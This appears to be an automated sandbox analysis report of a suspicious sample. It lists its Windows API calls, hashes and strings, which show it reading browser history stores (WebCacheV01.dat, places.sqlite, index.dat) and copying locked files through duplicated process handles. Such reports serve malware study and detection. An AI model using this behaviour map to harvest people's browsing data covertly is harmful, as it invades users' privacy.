                                                                                                              • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                              • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressHandleModuleProcProcessTimes
                                                                                                              • String ID: GetProcessTimes$kernel32.dll
                                                                                                              • API String ID: 1714573020-3385500049
                                                                                                              • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                              • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                              • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                              • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 004087D6
                                                                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                              • memset.MSVCRT ref: 00408828
                                                                                                              • memset.MSVCRT ref: 00408840
                                                                                                              • memset.MSVCRT ref: 00408858
                                                                                                              • memset.MSVCRT ref: 00408870
                                                                                                              • memset.MSVCRT ref: 00408888
                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 2911713577-0
                                                                                                              • Opcode ID: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                                                              • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                              • Opcode Fuzzy Hash: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                                                              • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
APIs
• memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
• memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
• memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
Strings
Memory Dump Source
• Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: memcmp
• String ID: @ $SQLite format 3
• API String ID: 1475443563-3708268960
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: _wcsicmpqsort
• String ID: /nosort$/sort
• API String ID: 1579243037-1578091866
APIs
• memset.MSVCRT ref: 0040E60F
• memset.MSVCRT ref: 0040E629
  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
Strings
• Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
• Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
Memory Dump Source
• Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
• String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
• API String ID: 2887208581-2114579845
APIs
• FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
• SizeofResource.KERNEL32(?,00000000), ref: 004148D4
• LoadResource.KERNEL32(?,00000000), ref: 004148E4
• LockResource.KERNEL32(00000000), ref: 004148EF
Memory Dump Source
• Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID:
• API String ID: 3473537107-0
APIs
Strings
• only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
Memory Dump Source
• Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: memset
• String ID: only a single result allowed for a SELECT that is part of an expression
• API String ID: 2221118986-1725073988
APIs
• ??3@YAXPAX@Z.MSVCRT(?,00000000,00412966,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004125C3
• DeleteObject.GDI32(00000000), ref: 004125E7
Strings
Memory Dump Source
• Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: ??3@DeleteObject
• String ID: r!A
• API String ID: 1103273653-628097481
APIs
• ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
• ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
• ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
• ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
Memory Dump Source
• Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: ??2@
• String ID:
• API String ID: 1033339047-0
APIs
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
• memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
Strings
Memory Dump Source
• Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: AddressProc$memcmp
• String ID: $$8
• API String ID: 2808797137-435121686
APIs
  • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
  • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
  • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
  • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
  • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
  • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
  • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
  • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
  • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
• CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
  • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
  • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
  • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,771B2EE0), ref: 0040E3EC
• DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
• CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
  • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
  • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
  • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
Memory Dump Source
• Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
• String ID:
• API String ID: 1979745280-0
                                                                                                              • Opcode ID: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                                                              • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                              • Opcode Fuzzy Hash: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                                                              • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
APIs
  • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
  • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
  • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
• GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
• GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
• free.MSVCRT ref: 00418803
Memory Dump Source
• Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
• String ID:
• API String ID: 1355100292-0
• Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
• Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
• Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
• Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
APIs
  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
• memset.MSVCRT ref: 00403A55
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
Strings
Memory Dump Source
• Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
• String ID: history.dat$places.sqlite
• API String ID: 2641622041-467022611
• Opcode ID: 3785298ac20b2a611d3c3277302934fe50b5cf091534855024bd32ed14c81bb0
• Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
• Opcode Fuzzy Hash: 3785298ac20b2a611d3c3277302934fe50b5cf091534855024bd32ed14c81bb0
• Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
APIs
  • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
• ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
• GetLastError.KERNEL32 ref: 00417627
Memory Dump Source
• Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: ErrorLast$File$PointerRead
• String ID:
• API String ID: 839530781-0
• Opcode ID: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
• Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
• Opcode Fuzzy Hash: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
• Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
Strings
Memory Dump Source
• Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: FileFindFirst
• String ID: *.*$index.dat
• API String ID: 1974802433-2863569691
• Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
• Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
• Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
• Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
APIs
• SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
• GetLastError.KERNEL32 ref: 004175A2
• GetLastError.KERNEL32 ref: 004175A8
Memory Dump Source
• Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: ErrorLast$FilePointer
• String ID:
• API String ID: 1156039329-0
• Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
• Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
• Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
• Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
APIs
• CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
• GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
• CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
Memory Dump Source
• Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: File$CloseCreateHandleTime
• String ID:
• API String ID: 3397143404-0
• Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
• Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
• Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
• Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
APIs
• GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
• GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
• GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
Memory Dump Source
• Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: Temp$DirectoryFileNamePathWindows
• String ID:
• API String ID: 1125800050-0
• Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
• Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
• Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
• Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
APIs
• Sleep.KERNEL32(00000064), ref: 004175D0
• CloseHandle.KERNELBASE(?,00000000,00000000,0045DBC0,00417C24,00000008,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
Strings
Memory Dump Source
• Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: CloseHandleSleep
• String ID: }A
• API String ID: 252777609-2138825249
• Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
• Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
• Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
• Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                              APIs
                                                                                                              • malloc.MSVCRT ref: 00409A10
                                                                                                              • memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                              • free.MSVCRT ref: 00409A31
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: freemallocmemcpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 3056473165-0
                                                                                                              • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                              • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                              • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                              • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: d
                                                                                                              • API String ID: 0-2564639436
